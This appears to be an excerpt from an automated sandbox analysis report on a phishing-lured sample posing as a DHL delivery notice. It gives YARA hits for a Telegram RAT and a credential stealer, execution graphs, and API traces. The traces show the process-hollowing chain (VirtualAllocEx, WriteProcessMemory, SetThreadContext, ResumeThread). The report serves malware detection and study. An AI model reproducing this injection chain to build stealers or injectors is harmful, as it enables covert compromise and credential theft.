                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:moderate

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:7.1%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:10%
                                                                              Total number of Nodes:30
                                                                              Total number of Limit Nodes:3
                                                                              execution_graph 10524 49ef418 10525 49ef460 ReadProcessMemory 10524->10525 10526 49ef49d 10525->10526 10527 49ef718 10528 49ef759 ResumeThread 10527->10528 10529 49ef786 10528->10529 10530 49ef358 10531 49ef3a0 SetThreadContext 10530->10531 10533 49ef3de 10531->10533 10542 49ef508 10543 49ef54b VirtualAllocEx 10542->10543 10544 49ef582 10543->10544 10545 49eb5f8 10546 49eb5ae DuplicateHandle 10545->10546 10548 49eb607 10545->10548 10547 49eb5ce 10546->10547 10553 49eef28 10554 49eefb5 CreateProcessAsUserA 10553->10554 10556 49ef1cd 10554->10556 10534 49eb310 GetCurrentProcess 10535 49eb38a GetCurrentThread 10534->10535 10536 49eb383 10534->10536 10537 49eb3c7 GetCurrentProcess 10535->10537 10538 49eb3c0 10535->10538 10536->10535 10539 49eb3fd 10537->10539 10538->10537 10540 49eb425 GetCurrentThreadId 10539->10540 10541 49eb456 10540->10541 10549 49ef5b0 10550 49ef5fb WriteProcessMemory 10549->10550 10552 49ef64c 10550->10552

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 65 49eef28-49eefc1 67 49ef015-49ef035 65->67 68 49eefc3-49eefe8 65->68 71 49ef089-49ef0ba 67->71 72 49ef037-49ef05c 67->72 68->67 73 49eefea-49eefec 68->73 82 49ef0bc-49ef0e4 71->82 83 49ef111-49ef1cb CreateProcessAsUserA 71->83 72->71 80 49ef05e-49ef060 72->80 74 49eefee-49eeff8 73->74 75 49ef00f-49ef012 73->75 77 49eeffc-49ef00b 74->77 78 49eeffa 74->78 75->67 77->77 81 49ef00d 77->81 78->77 84 49ef062-49ef06c 80->84 85 49ef083-49ef086 80->85 81->75 82->83 90 49ef0e6-49ef0e8 82->90 97 49ef1cd-49ef1d3 83->97 98 49ef1d4-49ef248 83->98 87 49ef06e 84->87 88 49ef070-49ef07f 84->88 85->71 87->88 88->88 91 49ef081 88->91 92 49ef0ea-49ef0f4 90->92 93 49ef10b-49ef10e 90->93 91->85 95 49ef0f8-49ef107 92->95 96 49ef0f6 92->96 93->83 95->95 99 49ef109 95->99 96->95 97->98 107 49ef24a-49ef24e 98->107 108 49ef258-49ef25c 98->108 99->93 107->108 109 49ef250 107->109 110 49ef25e-49ef262 108->110 111 49ef26c-49ef270 108->111 109->108 110->111 112 49ef264 110->112 113 49ef272-49ef276 111->113 114 49ef280-49ef284 111->114 112->111 113->114 115 49ef278 113->115 116 49ef296-49ef29d 114->116 117 49ef286-49ef28c 114->117 115->114 118 49ef29f-49ef2ae 116->118 119 49ef2b4 116->119 117->116 118->119
                                                                              APIs
                                                                              • CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 049EF1B8
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.388933365.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_49e0000_Dhl recent package delivery report needs attention.jbxd
                                                                              Similarity
                                                                              • API ID: CreateProcessUser
                                                                              • String ID:
                                                                              • API String ID: 2217836671-0
                                                                              • Opcode ID: 9810249fdc006c843d0400e52dcf3a493313a9cd543921bb1dbc33c1fcd2abb4
                                                                              • Instruction ID: d3f34c6e1852eebaf04629a3703be636f46dffa2fed4aef0c4e986ea08e8e042
                                                                              • Opcode Fuzzy Hash: 9810249fdc006c843d0400e52dcf3a493313a9cd543921bb1dbc33c1fcd2abb4
                                                                              • Instruction Fuzzy Hash: 74A16E71E00259AFDB11CF69C8417EDBBB6FF48304F00856AE818A7395DB74A985CF81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32 ref: 049EB370
                                                                              • GetCurrentThread.KERNEL32 ref: 049EB3AD
                                                                              • GetCurrentProcess.KERNEL32 ref: 049EB3EA
                                                                              • GetCurrentThreadId.KERNEL32 ref: 049EB443
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.388933365.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_49e0000_Dhl recent package delivery report needs attention.jbxd
                                                                              Similarity
                                                                              • API ID: Current$ProcessThread
                                                                              • String ID:
                                                                              • API String ID: 2063062207-0
                                                                              • Opcode ID: 76c0a6dd7b69b2add3ddf2e9fc58a025c5b0502309057746054c00700149251e
                                                                              • Instruction ID: ce9206b376ecb36a1afb1b7a0bfa720031c4433c8d88822ce127e2068a69bcf6
                                                                              • Opcode Fuzzy Hash: 76c0a6dd7b69b2add3ddf2e9fc58a025c5b0502309057746054c00700149251e
                                                                              • Instruction Fuzzy Hash: 345136B09017898FDB21CFAAD9487AEBBF1EF49314F248469E409B7350D734A945CB62
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32 ref: 049EB370
                                                                              • GetCurrentThread.KERNEL32 ref: 049EB3AD
                                                                              • GetCurrentProcess.KERNEL32 ref: 049EB3EA
                                                                              • GetCurrentThreadId.KERNEL32 ref: 049EB443
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.388933365.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_49e0000_Dhl recent package delivery report needs attention.jbxd
                                                                              Similarity
                                                                              • API ID: Current$ProcessThread
                                                                              • String ID:
                                                                              • API String ID: 2063062207-0
                                                                              • Opcode ID: e705c00e0938dc25ef1bb7d0fb98fa49b083176ff55314d3e88ce8a8795837ad
                                                                              • Instruction ID: 7b622f9c76cab1cfb4c711f7bc130ed7ef5d58fa773a68b66aba9f74bbc11731
                                                                              • Opcode Fuzzy Hash: e705c00e0938dc25ef1bb7d0fb98fa49b083176ff55314d3e88ce8a8795837ad
                                                                              • Instruction Fuzzy Hash: 9D5146B09017898FDB11CFAAD948BAEBBF0EF48314F248459E409B7350D734A844CF66
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 121 49eb5f8-49eb605 122 49eb5ae-49eb5cc DuplicateHandle 121->122 123 49eb607-49eb726 121->123 124 49eb5ce-49eb5d4 122->124 125 49eb5d5-49eb5f2 122->125 124->125
                                                                              APIs
                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 049EB5BF
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.388933365.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_49e0000_Dhl recent package delivery report needs attention.jbxd
                                                                              Similarity
                                                                              • API ID: DuplicateHandle
                                                                              • String ID:
                                                                              • API String ID: 3793708945-0
                                                                              • Opcode ID: 18be777ca0cc39b7809b70a0ff0f53a1a45d570ef4f1d875aa56dcf35e24b755
                                                                              • Instruction ID: d9f4442636e06ab6f6053bd057ad0de31e7a0219187667d4f998bbc167dc4ef5
                                                                              • Opcode Fuzzy Hash: 18be777ca0cc39b7809b70a0ff0f53a1a45d570ef4f1d875aa56dcf35e24b755
                                                                              • Instruction Fuzzy Hash: A1319C786413408FE7159F74E848BAA3BA1F7DA311F10416AEA058F3E5EA3A1C47DF50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 242 49eb530-49eb5cc DuplicateHandle 243 49eb5ce-49eb5d4 242->243 244 49eb5d5-49eb5f2 242->244 243->244
                                                                              APIs
                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 049EB5BF
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.388933365.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_49e0000_Dhl recent package delivery report needs attention.jbxd
                                                                              Similarity
                                                                              • API ID: DuplicateHandle
                                                                              • String ID:
                                                                              • API String ID: 3793708945-0
                                                                              • Opcode ID: bb8224a19a04e80aee101d750f17067126aae956e6676d10f3c4e705cde7bd61
                                                                              • Instruction ID: 503bca069601f659432c8fa2211c57680f8b6c3ca914d8558892cdf4a8bc4cc4
                                                                              • Opcode Fuzzy Hash: bb8224a19a04e80aee101d750f17067126aae956e6676d10f3c4e705cde7bd61
                                                                              • Instruction Fuzzy Hash: C42103B5D00248AFDB10CFA9D484ADEBBF4EB48320F14842AE914A3310D374A945DFA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 247 49ef5b0-49ef601 249 49ef603-49ef60f 247->249 250 49ef611-49ef64a WriteProcessMemory 247->250 249->250 251 49ef64c-49ef652 250->251 252 49ef653-49ef674 250->252 251->252
                                                                              APIs
                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 049EF63D
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.388933365.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_49e0000_Dhl recent package delivery report needs attention.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessWrite
                                                                              • String ID:
                                                                              • API String ID: 3559483778-0
                                                                              • Opcode ID: 95b4844cb0445c7e79f49e0eb35fbf9331bd0d15d397ff47951bdf404c3c42e7
                                                                              • Instruction ID: c40701b4ef8ed0cd4088a0d077bbae84fa95fd6d108ee2e6f047ca35686ff3d9
                                                                              • Opcode Fuzzy Hash: 95b4844cb0445c7e79f49e0eb35fbf9331bd0d15d397ff47951bdf404c3c42e7
                                                                              • Instruction Fuzzy Hash: AB21E4B1901359DFCB10CF9AD885BDEBBF4FB48314F10842AE918A3250D778A954CBA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 254 49eb538-49eb5cc DuplicateHandle 255 49eb5ce-49eb5d4 254->255 256 49eb5d5-49eb5f2 254->256 255->256
                                                                              APIs
                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 049EB5BF
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.388933365.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_49e0000_Dhl recent package delivery report needs attention.jbxd
                                                                              Similarity
                                                                              • API ID: DuplicateHandle
                                                                              • String ID:
                                                                              • API String ID: 3793708945-0
                                                                              • Opcode ID: db8d32e21c0789218680cbf40738a42c2179e0319c9f959a4bd6c5ad50ced4cc
                                                                              • Instruction ID: 4941e6acc21e84347d953e002241736eb765ac1297c6c63845fffdc2c23c9f31
                                                                              • Opcode Fuzzy Hash: db8d32e21c0789218680cbf40738a42c2179e0319c9f959a4bd6c5ad50ced4cc
                                                                              • Instruction Fuzzy Hash: AF21C4B59002489FDB10CF9AD984ADEBBF8EB48324F14841AE955B3350D774A944DFA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 259 49ef358-49ef3a4 261 49ef3a6-49ef3ae 259->261 262 49ef3b0-49ef3dc SetThreadContext 259->262 261->262 263 49ef3de-49ef3e4 262->263 264 49ef3e5-49ef406 262->264 263->264
                                                                              APIs
                                                                              • SetThreadContext.KERNELBASE(?,00000000), ref: 049EF3CF
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.388933365.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_49e0000_Dhl recent package delivery report needs attention.jbxd
                                                                              Similarity
                                                                              • API ID: ContextThread
                                                                              • String ID:
                                                                              • API String ID: 1591575202-0
                                                                              • Opcode ID: ba48e340b2434114ffd4b46f39b78dd5bc4c2d1dadd332a24df58b0842caa2b7
                                                                              • Instruction ID: 61063a0d793b5b0160a046e35534e44a24dbf7f1053f61a75aede0a94baa00a0
                                                                              • Opcode Fuzzy Hash: ba48e340b2434114ffd4b46f39b78dd5bc4c2d1dadd332a24df58b0842caa2b7
                                                                              • Instruction Fuzzy Hash: C42106B1D006599FDB10CF9AC8857EEFBF8BB48324F14812AE418B3740D778A9448FA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 266 49ef418-49ef49b ReadProcessMemory 268 49ef49d-49ef4a3 266->268 269 49ef4a4-49ef4c5 266->269 268->269
                                                                              APIs
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 049EF48E
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.388933365.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_49e0000_Dhl recent package delivery report needs attention.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessRead
                                                                              • String ID:
                                                                              • API String ID: 1726664587-0
                                                                              • Opcode ID: 663e200674d5ae2bce7e91e453feb6a3a77eeb8aa41bee9774be86649d6ba8dc
                                                                              • Instruction ID: 3a6f05370459ee7400478052f37a4c27a18245fc55feaf2c7954cd32cd0d85d1
                                                                              • Opcode Fuzzy Hash: 663e200674d5ae2bce7e91e453feb6a3a77eeb8aa41bee9774be86649d6ba8dc
                                                                              • Instruction Fuzzy Hash: 9E21D3B59006499FCB10CF9AC884BDEBBF4FF48324F14842AE958A7250D378A545DFA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 271 49ef508-49ef580 VirtualAllocEx 273 49ef589-49ef59d 271->273 274 49ef582-49ef588 271->274 274->273
                                                                              APIs
                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 049EF573
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.388933365.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_49e0000_Dhl recent package delivery report needs attention.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 50434a3dae596329310bbc8a817665fac30c0e8044e1e627669d1f18d7f87bec
                                                                              • Instruction ID: 24202d0991ad2da63cbbe966899c854df545defb023c60a546819944fc0b9091
                                                                              • Opcode Fuzzy Hash: 50434a3dae596329310bbc8a817665fac30c0e8044e1e627669d1f18d7f87bec
                                                                              • Instruction Fuzzy Hash: 3111F5B5900689DFCB10CF9AC884BDEBFF4FB48324F14841AE519A7250D775A544CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 276 49ef718-49ef784 ResumeThread 278 49ef78d-49ef7a1 276->278 279 49ef786-49ef78c 276->279 279->278
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.388933365.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_49e0000_Dhl recent package delivery report needs attention.jbxd
                                                                              Similarity
                                                                              • API ID: ResumeThread
                                                                              • String ID:
                                                                              • API String ID: 947044025-0
                                                                              • Opcode ID: 42f1dd72615ac5649fa598981524f365347840cc3768bdb1b7a5a23f460060b7
                                                                              • Instruction ID: b819ca1f84f25f72bd1db3aa504eb3c55f1a329743f044403095105a561a15d2
                                                                              • Opcode Fuzzy Hash: 42f1dd72615ac5649fa598981524f365347840cc3768bdb1b7a5a23f460060b7
                                                                              • Instruction Fuzzy Hash: 351112B58003888FCB10CF9AD484BDEBBF8EB88324F20841AD519B3250C775A944CFA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Execution Graph

                                                                              Execution Coverage:12.2%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:5.6%
                                                                              Total number of Nodes:125
                                                                              Total number of Limit Nodes:13
                                                                              execution_graph 22798 a106b10 22799 a106b25 22798->22799 22800 a106e00 22799->22800 22801 a107e68 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 22799->22801 22805 a10804b 22799->22805 22810 a106e19 22799->22810 22816 a106fb0 22799->22816 22801->22799 22806 a10804c 22805->22806 22807 a10808e 22806->22807 22819 a108368 22806->22819 22823 a108359 22806->22823 22807->22799 22811 a106e39 22810->22811 22812 a106e5c 22810->22812 22811->22799 22813 a106e86 22812->22813 22847 a107078 22812->22847 22813->22799 22814 a106fd7 22814->22799 22817 a106fd7 22816->22817 22818 a107078 3 API calls 22816->22818 22817->22799 22818->22817 22820 a108376 22819->22820 22827 a108390 22819->22827 22835 a1083a0 22819->22835 22820->22807 22825 a108390 2 API calls 22823->22825 22826 a1083a0 2 API calls 22823->22826 22824 a108376 22824->22807 22825->22824 22826->22824 22828 a1083d5 22827->22828 22829 a1083ad 22827->22829 22843 a1069c8 22828->22843 22829->22820 22831 a1083f6 22831->22820 22833 a1084be GlobalMemoryStatusEx 22834 a1084ee 22833->22834 22834->22820 22836 a1083d5 22835->22836 22837 a1083ad 22835->22837 22838 a1069c8 GlobalMemoryStatusEx 22836->22838 22837->22820 22840 a1083f2 22838->22840 22839 a1083f6 22839->22820 22840->22839 22841 a1084be GlobalMemoryStatusEx 22840->22841 22842 a1084ee 22841->22842 22842->22820 22844 a108478 GlobalMemoryStatusEx 22843->22844 22846 a1083f2 22844->22846 22846->22831 22846->22833 22848 a10708c 22847->22848 22850 a1070ca 22847->22850 22852 a107078 3 API calls 22848->22852 22849 a1070a2 22853 a107e68 22849->22853 22850->22814 22852->22849 22854 a107e73 22853->22854 22856 a107e9b 22853->22856 22854->22850 22855 a107ef1 22855->22850 22856->22855 22857 a107f8f 22856->22857 22860 a107f9d 22856->22860 22858 a106fb0 3 API calls 22857->22858 22859 a107f96 22858->22859 22859->22850 22860->22859 22861 a108368 3 API calls 22860->22861 22862 a108359 3 API calls 22860->22862 22861->22859 22862->22859 22925 a102db0 22926 a102dcf LdrInitializeThunk 22925->22926 22928 a102e03 22926->22928 22863 a108cd8 22864 a108ce6 22863->22864 22866 a108d09 22863->22866 22865 a108d2e 22866->22865 22867 a106fb0 3 API calls 22866->22867 22868 a108efe 22867->22868 22929 a10d4f8 GetCurrentProcess 22930 a10d572 GetCurrentThread 22929->22930 22931 a10d56b 22929->22931 22932 a10d5a8 22930->22932 22933 a10d5af GetCurrentProcess 22930->22933 22931->22930 22932->22933 22934 a10d5e5 22933->22934 22938 a10d6b8 22934->22938 22936 a10d63e 22941 a10d19c 22938->22941 22942 a10d720 DuplicateHandle 22941->22942 22943 a10d60d GetCurrentThreadId 22942->22943 22943->22936 22944 a1030e8 22946 a103109 22944->22946 22945 a103431 22946->22945 22948 a103ec0 RegQueryValueExW 22946->22948 22949 a103808 22946->22949 22948->22946 22950 a10385a RegOpenKeyExW 22949->22950 22952 a1038ce 22950->22952 22869 8d4540 22870 8d4554 22869->22870 22873 8d478a 22870->22873 22871 8d455d 22874 8d4793 22873->22874 22879 8d496c 22873->22879 22884 8d4870 22873->22884 22889 8d4986 22873->22889 22894 8d485f 22873->22894 22874->22871 22880 8d491f 22879->22880 22881 8d49ab 22880->22881 22899 8d4c78 22880->22899 22904 8d4c67 22880->22904 22881->22881 22885 8d48b4 22884->22885 22886 8d49ab 22885->22886 22887 8d4c78 2 API calls 22885->22887 22888 8d4c67 2 API calls 22885->22888 22887->22886 22888->22886 22890 8d4999 22889->22890 22891 8d49ab 22889->22891 22892 8d4c78 2 API calls 22890->22892 22893 8d4c67 2 API calls 22890->22893 22892->22891 22893->22891 22895 8d48b4 22894->22895 22896 8d49ab 22895->22896 22897 8d4c78 2 API calls 22895->22897 22898 8d4c67 2 API calls 22895->22898 22897->22896 22898->22896 22900 8d4c86 22899->22900 22909 8d4cc8 22900->22909 22913 8d4cbb 22900->22913 22901 8d4c96 22901->22881 22905 8d4c86 22904->22905 22907 8d4cc8 RtlEncodePointer 22905->22907 22908 8d4cbb RtlEncodePointer 22905->22908 22906 8d4c96 22906->22881 22907->22906 22908->22906 22910 8d4d02 22909->22910 22911 8d4d2c RtlEncodePointer 22910->22911 22912 8d4d55 22910->22912 22911->22912 22912->22901 22914 8d4d02 22913->22914 22915 8d4d2c RtlEncodePointer 22914->22915 22916 8d4d55 22914->22916 22915->22916 22916->22901 22917 8dadd0 22918 8dadee 22917->22918 22921 8d9c5c 22918->22921 22920 8dae25 22922 8dc8f0 LoadLibraryA 22921->22922 22924 8dc9cc 22922->22924

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 19 a104bc8-a104be1 20 a104be7-a104bfb 19->20 21 a104c9c-a104cac 19->21 24 a104c01 20->24 25 a104bfd-a104bff 20->25 26 a104cb4-a104cbb 21->26 378 a104cae call a104bc8 21->378 379 a104cae call a104b19 21->379 380 a104cae call a104e6c 21->380 27 a104c04-a104c19 24->27 25->27 29 a104c60-a104c89 call a103e38 27->29 30 a104c1b-a104c2a 27->30 34 a104c94-a104c9a 29->34 35 a104c8b-a104c92 29->35 36 a104c30-a104c33 30->36 37 a104cbc 30->37 34->26 35->26 38 a104cc1-a104cfb 36->38 39 a104c39-a104c3f 36->39 37->38 45 a104d3d-a104d3f 38->45 46 a104cfd-a104d02 38->46 39->29 41 a104c41-a104c5e 39->41 41->29 48 a104d41-a104d47 45->48 49 a104d49-a104d5d 45->49 50 a104f23 46->50 51 a104d08-a104d0b 46->51 52 a104d7e-a104d80 48->52 69 a104d78 49->69 70 a104d5f-a104d63 49->70 54 a104f28-a105179 50->54 53 a104d11-a104d17 51->53 51->54 55 a104d82-a104d87 52->55 56 a104d89-a104d92 52->56 53->45 58 a104d19-a104d38 53->58 152 a105aa0 54->152 153 a10517f-a105189 54->153 55->56 59 a104dec-a104def 55->59 66 a104da2-a104db4 56->66 67 a104d94-a104d9d 56->67 75 a104e4d-a104e61 58->75 59->50 62 a104df5-a104df8 59->62 62->54 65 a104dfe-a104e04 62->65 72 a104e25-a104e36 65->72 73 a104e06-a104e23 65->73 66->50 80 a104dba-a104dbd 66->80 67->72 69->52 70->69 74 a104d65-a104d76 70->74 72->75 85 a104e38-a104e47 72->85 73->72 74->52 74->69 94 a104e68-a104eff 75->94 80->54 84 a104dc3-a104dc9 80->84 84->72 88 a104dcb-a104dea 84->88 85->75 88->72 104 a104f01-a104f05 94->104 105 a104f07-a104f0d 94->105 104->105 107 a104f0f-a104f15 104->107 106 a104f17-a104f20 105->106 107->106 156 a105aa5-a105acf 152->156 154 a1053d5-a105434 call a102338 153->154 155 a10518f-a1051a1 153->155 215 a105440-a10573b call a102338 * 3 154->215 157 a1051b0-a1051bf 155->157 158 a1051a3-a1051a8 155->158 162 a105ad1-a105adb 156->162 163 a105af4-a105b1f 156->163 157->156 160 a1051c5-a1051d9 157->160 158->157 168 a10522b-a105243 160->168 169 a1051db-a1051ed 160->169 166 a105af0-a105af3 162->166 167 a105add-a105aee 162->167 178 a105b21-a105b2b 163->178 179 a105b44-a105b6f 163->179 167->166 180 a105252-a105261 168->180 181 a105245-a10524a 168->181 171 a1051fc-a10520b 169->171 172 a1051ef-a1051f4 169->172 171->156 177 a105211-a105225 171->177 172->171 177->168 189 a1053bf-a1053c3 177->189 183 a105b40-a105b43 178->183 184 a105b2d-a105b3e 178->184 191 a105b71-a105b7b 179->191 192 a105b94-a105bd2 179->192 186 a1053a6-a1053ba 180->186 187 a105267-a10527e 180->187 181->180 184->183 186->189 187->189 205 a105284-a10528a 187->205 189->152 194 a1053c9-a1053cf 189->194 195 a105b90-a105b93 191->195 196 a105b7d-a105b8e 191->196 194->154 194->155 196->195 207 a10528c-a10529b 205->207 208 a10529d-a10529f 205->208 212 a1052a9-a1052c3 207->212 208->212 212->189 222 a1052c9-a1052e4 212->222 215->152 306 a105741-a105748 215->306 227 a1052f3-a105302 222->227 228 a1052e6-a1052eb 222->228 227->186 229 a105308-a105357 227->229 228->227 243 a105366-a105375 229->243 244 a105359-a10535e 229->244 243->186 245 a105377-a1053a4 243->245 244->243 245->189 307 a105a92-a105a9f 306->307 308 a10574e-a105751 306->308 309 a105760-a105766 308->309 310 a105753-a105758 308->310 309->156 311 a10576c-a10577a 309->311 310->309 313 a105780-a105783 311->313 314 a105a84-a105a87 311->314 315 a105792-a105798 313->315 316 a105785-a10578a 313->316 314->152 317 a105a89-a105a8c 314->317 315->156 318 a10579e-a1057bd 315->318 316->315 317->307 317->308 321 a1057cc-a1057d2 318->321 322 a1057bf-a1057c4 318->322 321->156 323 a1057d8-a1057fc 321->323 322->321 323->314 325 a105802-a10580e 323->325 325->156 326 a105814-a105830 325->326 329 a105836-a1058ec 326->329 330 a105a6c-a105a70 326->330 346 a1058f2-a105977 329->346 347 a10597d-a1059ae 329->347 330->152 331 a105a72-a105a7e 330->331 331->314 331->325 346->347 347->330 358 a1059b4-a1059c3 347->358 362 a1059d2-a1059d8 358->362 363 a1059c5-a1059ca 358->363 362->156 364 a1059de-a105a28 362->364 363->362 372 a105a37-a105a3d 364->372 373 a105a2a-a105a2f 364->373 372->156 374 a105a3f-a105a65 372->374 373->372 374->330 378->26 379->26 380->26
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.640844260.000000000A100000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A100000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_a100000_vbc.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: \$\$\$\
                                                                              • API String ID: 0-3238275731
                                                                              • Opcode ID: 41e031b7182f5879db4af1e2f9587fb069508b8d02bc268d806e20013cfcb682
                                                                              • Instruction ID: 0f3863236eec55a9623573bcd9f9b45eeff12410bdbc532dccc9b9062766f5a4
                                                                              • Opcode Fuzzy Hash: 41e031b7182f5879db4af1e2f9587fb069508b8d02bc268d806e20013cfcb682
                                                                              • Instruction Fuzzy Hash: 16928F30A002148FCB14DF78D998BAEB7B6EF88310F1585AAD509DB385DF79AC468F51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 381 a102db0-a102dfc LdrInitializeThunk 385 a102e03-a102e0f 381->385 386 a103010-a103023 385->386 387 a102e15-a102e1e 385->387 388 a10304a-a10304e 386->388 389 a102e24-a102e39 387->389 390 a103045 387->390 391 a103050 388->391 392 a103059 388->392 394 a102e53-a102e6e 389->394 395 a102e3b-a102e4e 389->395 390->388 391->392 396 a10305a 392->396 406 a102e70-a102e7a 394->406 407 a102e7c 394->407 397 a102fe4-a102fe8 395->397 396->396 399 a102ff3-a102ffc 397->399 400 a102fea 397->400 403 a103040 399->403 404 a102ffe-a10300a 399->404 400->399 403->390 404->386 404->387 408 a102e81-a102e83 406->408 407->408 409 a102e85-a102e98 408->409 410 a102e9d-a102f36 408->410 409->397 428 a102f44 410->428 429 a102f38-a102f42 410->429 430 a102f49-a102f4b 428->430 429->430 431 a102f4d-a102f4f 430->431 432 a102f8e-a102fe2 430->432 433 a102f51-a102f5b 431->433 434 a102f5d 431->434 432->397 435 a102f62-a102f64 433->435 434->435 435->432 437 a102f66-a102f8c 435->437 437->432
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.640844260.000000000A100000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A100000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_a100000_vbc.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: c8c050ba9438f24882e653dc6e594f72b668055a3170135bd2915e4bf3c6b8ca
                                                                              • Instruction ID: adec1ac10926dfb00f0d921d1b0a3c2ceea2a7e49557dddf1273bdba279011c0
